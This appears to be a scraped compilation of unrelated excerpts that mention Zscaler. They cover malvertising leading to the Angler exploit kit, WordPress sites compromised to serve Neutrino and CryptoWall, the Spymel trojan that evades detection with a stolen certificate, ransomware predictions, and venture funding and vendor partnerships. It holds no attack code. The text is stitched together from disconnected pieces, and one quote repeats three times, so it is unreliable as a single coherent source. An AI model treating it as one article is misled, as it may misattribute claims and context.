Malvertising, or "malicious advertising," is not a new threat, and just a few weeks into 2016 ThreatLabZ has observed a malvertising campaign injecting iframes into banner advertisements that lead to the Angler Exploit Kit. Surprisingly, the Angler operators took some vacation for the New Year, as noted by F-Secure, and have only recently resumed operations, so we were surprised to see a malvertising campaign so soon after their break.
Venture capitalists last year rushed to fund start-ups touting potential solutions to increasingly widespread and sophisticated cyber attacks. Private cyber security companies including Crowdstrike, Illumio and Zscaler raised rounds of $100m, at valuations thought to be above $1bn in 2015. Tanium’s valuation grew from $1.7bn to $3.5bn in six months last year, according to a person familiar with their fundraising.
This year, Juniper formed a wireless partnership with Aerohive Networks in addition to its alliance with Aruba, which was bought by HP. Juniper says it will continue to stay with Aruba. Software-defined WAN specialist Silver Peak inked alliances with a trio of companies at the same time: hyper-converged startup Nutanix, Infoblox and Zscaler. Cisco created partnerships with the likes of giants Apple and Ericsson, while expanding its Microsoft partnership even though it still sees the Redmond, Wash.-based tech giant as a competitor in some areas. The list of technology partnerships formed in 2015 goes on and on.
Jeff Reed, vice president and general manager of Cisco's enterprise infrastructure and solutions group, noted in a statement that the company "is committed to open networking, and interoperability with the VeloCloud solution will provide our joint customers with additional enhancements for application and cloud services performance." VeloCloud is growing its vendor partnerships list, which now includes Cisco, BroadSoft, Equinix, Hewlett Packard Enterprise, IIx Console, Intel, VMware, Websense and Zscaler.
The natural next step is to look at how organisations can consolidate their existing security functions into one central framework. Results from Forrester support this suggestion. An overwhelming majority (98 per cent) of IT security professionals believe that an integrated security platform would be more effective in delivering a broad range of cyber security capabilities versus point solutions delivered by multiple vendors. In fact, 76 per cent of respondents claimed that the approach would be very effective in comparison.
In 2016, ransomware is expected to increasingly hit the corporate world, and it is a safe bet that companies will have to pay far larger sums than individuals. Indeed, the criminals running these extortion campaigns were not born yesterday, and when they realize they have locked up source code and financial documents that were not properly backed up, you can be certain the amount demanded may be exorbitant.
McCormack led Websense when Vista Equity Partners, a private equity firm also based in Austin, took the dot-com bust veteran private in 2013 for about $890 million. Its competitors have included Internet traffic-scrubbing cybersecurity firms such as Zscaler, a billion dollar “unicorn” startup, and Blue Coat, a once-public company acquired last year by Bain Capital for $2.4 billion.
Zscaler regularly detects and publishes blog posts about malicious applications coming from alternative Android app stores. Google will need to restrict the permissions available to applications that have not been approved through the Google Play submission process. Applications sideloaded from outside Google Play that request administrator-level permission should soon disappear. Google will also begin imposing acceptable timeframes for patches and firmware updates, which are largely controlled by its OEM partners.
However, new findings published by Zscaler's ThreatLabZ revealed that a new malware family is using compromised digital certificates to avoid detection. The way it works is it monitors the activity on an infected PC and conveys that information back to cyber criminals. In order to spread the virus, a phishing campaign is sent around via email. Known as Spymel, the malware is often difficult to spot as it uses legitimate certificates that were issued by DigiCert.
The idea of installing security appliances in a data center to protect employees dates from the 1990s, and it is outdated. Instead of sitting at a fixed workplace, employees today sit, for example, in cafés with their laptops and work via the cloud. Conventional security appliances are not only legacy baggage from traditional site-based concepts; they constrain day-to-day business instead of supporting it. Moreover, they are often built for a single security function. As a result, new appliances sprout up in data centers like mushrooms: a new device for every new threat. And every single one has to be bought, installed, maintained and updated.
There Goes The Neighborhood — Bad Actors on GMHOST Alexander Mulgin Serginovic (Zscaler Threat Lab)
“Users are all too willing to begrudgingly pay an expensive but not excessive ransom in exchange for the return of their precious data,” Sutton says. “Even the FBI are recommending that it’s easier to pay than fight. The wildly profitable CryptoLocker has attracted many clones since it was largely knocked offline following Operation Tovar.” Many of these clones, including more popular variants such as CryptoWall and TorrentLocker largely followed the proven formula, but we’re starting to see variations such as mobile and Linux focused ransomware. “The latter is especially important as it’s more likely to impact the websites and code repositories of enterprises, who in our experience are also very willing to pay up rather than risk losing critical intellectual property,” says Sutton.
“The digital certificate will give a false sense of authenticity to the end user especially when the certificate belongs to a legitimate software vendor,” said Deepen Desai, director of security research at Zscaler. “This approach also helps malware authors in evading detection as it is common for security vendors to bypass advanced heuristic checks for payloads that are signed using legitimate trusted certificates,” he said. Although such techniques have been used in the past to install spyware and adware payloads, it is a relatively new trend when it comes to malware.
Two significant flaws were identified in the system over the past year. Last August, Zscaler researchers noticed that, by exploiting one of WordPress's security flaws, the Neutrino exploit kit was being mass-distributed through such websites. This is one of cybercriminals' most popular exploit kits, and every new technique is incorporated into it very quickly, allowing even zero-day vulnerabilities to be exploited.
In August, according to Zscaler security firm, cybercriminals compromised more than 2,600 WordPress websites and deployed malicious iframes on 4,200 distinct pages. The criminals exploited vulnerable versions of WordPress 4.2, and prior, to plant the iframes which were used to redirect users to domains hosting the Neutrino exploit kit. The Neutrino landing page was designed to exploit Flash Player vulnerabilities in order to serve the last variant of the popular ransomware CryptoWall 3.0.
As Deepen Desai, director of security research at Zscaler explained, “The digital certificate will give a false sense of authenticity to the end user especially when the certificate belongs to a legitimate software vendor. This approach also helps malware authors in evading detection as it is common for security vendors to bypass advanced heuristic checks for payloads that are signed using legitimate trusted certificates,” he said.
“There are a lot of security vendors who do not perform SSL inspection. You have to do SSL man in the middle inspection,” Zscaler head of security research Deepen Desai told SCMagazine.com. “A lot of these advanced attacks are multi-stage attacks trying to exploit this scenario.” Once executed, the code logs user keystrokes and prevents the user from terminating the malware through system tools like TaskMgr, Procexp, ProcessHacker and Taskkill.
Zscaler, a US-based cybersecurity product vendor, has discovered a new trojan that spreads via spam e-mail and uses digital certificates to infect computers and pass unnoticed by security products. Named Spymel, this trojan first arrives on computers as a compressed file attached to an e-mail.
Zscaler found that the C&C server may send a host of commands to infected machines. These include collecting information about the infected system and the files found on it, as well as deleting, executing or renaming a specified file. A specified file can be uploaded to the C&C and so can a screenshot of the desktop. Enabling or disabling video recording can also be performed.
Besides using digital certificates to hide from antivirus software, Spymel also has some extra tricks up its sleeve. The trojan comes with a module called ProtectMe, which, when loaded, has the ability to prevent the user from terminating the malware's process via the taskkill shell command and tools like Process Explorer, Task Manager, and Process Hacker. Zscaler researchers say that Spymel's C&C server is located somewhere in Germany, at android.sh (184.108.40.206), on port 1216. This is probably a rented server, and its owner's real location is somewhere else.
There’s a wide range of commands that SpyMel supports, basically giving full backdoor control to the remote attacker. They can browse through files, rename files, delete files and send out an update to install on the victim machine. Many banking sites display an interactive keyboard or keypad that can be used to enter credentials or pin code—SpyMel’s video recording feature will allow the attackers to compromise those credentials as well. It’s targeting the Web browsers. This particular malware arrives via spam email and all Windows users are a target. Once a particular system has been compromised, it can lead to more targeted attack since the victim has been identified by the attacker.
“The digital certificate will give a false sense of authenticity to the end user especially when the certificate belongs to a legitimate software vendor,” says Deepen Desai, director of security research at Zscaler. “This approach also helps malware authors in evading detection as it is common for security vendors to bypass advanced heuristic checks for payloads that are signed using legitimate trusted certificates,” he said.
In late December, security experts at Zscaler ThreatLabZ detected a new infostealer malware family dubbed Spymel that uses stolen certificates to evade detection. “ThreatLabZ came across yet another malware family where the authors are using compromised digital certificates to evade detection. The malware family in this case is the information stealing Trojan Spymel and involved a .NET executable signed with a legitimate DigiCert issued certificate.” states a blog post published by Zscaler.
“The malware monitors applications like Task Manager, Process Explorer, and Process Hacker. It uses the GetForegroundWindow() API to get the handle of the active window and changes its functionality if the process is from the above list,” Zscaler researchers explained. Attackers can use the C&C server to send various commands to the malware, including for collecting information about the infected system and the files found on it, deleting, executing or renaming a specified file, uploading a specified file to the C&C, capturing a screenshot of the desktop, and enabling or disabling video recording.
With more than 140 million downloads, WordPress is the most popular CMS on the Web, but it’s also the most attacked. It’s not uncommon for malicious actors to exploit vulnerabilities in both WordPress itself and various plugins. In August, security firm Zscaler reported that thousands of WordPress websites had been compromised and abused to redirect visitors to Neutrino exploit kit sites set up to serve malware.
German companies are increasingly asking for an efficient solution to secure corporate Internet traffic for all employees, regardless of their location, EBF reports. The Cologne-based consulting and software house now intends to address exactly this need and has signed a partnership agreement with security vendor Zscaler to that end.
Password reuse attacks will begin to decline, thanks in large part to the smartphone, said Zscaler CISO Michael Sutton. "Smartphones can be many things but they make for a handy, secure, always with you, data repository. As such, people are starting to adopt password managers such as 1Password and LastPass and other user friendly smartphone apps that present a convenient option for always having sensitive data such as passwords within easy reach," he said.
American business magnate Warren Buffett once said, “It takes twenty years to build a reputation and five minutes to ruin it. If you think about that, you’ll do things differently.” Hot on the heels of the fallout from the TalkTalk hack, that stark reality rings true for many organisations, and for their Chief Information Security Officers (CISOs) in particular. Doing things differently in relation to data security strategy is no longer a project for the wish-list, but a boardroom priority.
A quick sort of the cybercorns listed identifies those that deliver value as a cloud service: Okta, Zscaler, CloudFlare and Illumio deliver products and technologies form-factored for the cloud, paid for on a subscription basis, that are easy to adopt, sticky (valuable) and non-intrusive in traditional IT operations.